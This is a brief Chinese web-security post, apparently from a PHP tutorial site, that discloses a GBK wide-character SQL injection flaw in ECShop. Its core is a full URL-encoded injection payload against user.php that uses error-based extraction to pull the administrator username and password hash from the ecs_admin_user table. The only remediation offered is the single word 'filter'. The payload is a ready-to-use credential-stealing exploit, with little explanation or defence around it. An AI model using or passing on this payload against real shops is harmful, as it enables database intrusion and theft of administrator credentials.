ecshop gbk存在宽字符注入 - 网站安全

ecshop gbk存在宽字符注入 - 网站安全 - 自学php

来源：自学PHP网时间：2015-04-17 12:00 作者：阅读:次

[导读] ecshop 对宽字符过滤还是不完整。提下以下参数：http://www.xx.com/user.php?act=is_registeredusername=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,con......

ecshop 对宽字符过滤还是不完整。

提下以下参数：

http://www.xx.com/user.php?act=is_registered&username=%ce%27%20and%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23

修复方案：

过滤

Invision Power Board <= 3.3.4 "unserialize()" P

好孩子某处xss+任意文件上传 - 网站安全 - 自学

子栏目

ecshop gbk存在宽字符注入 - 网站安全 - 自学php

最新评论

添加评论

更多文章推荐

添加评论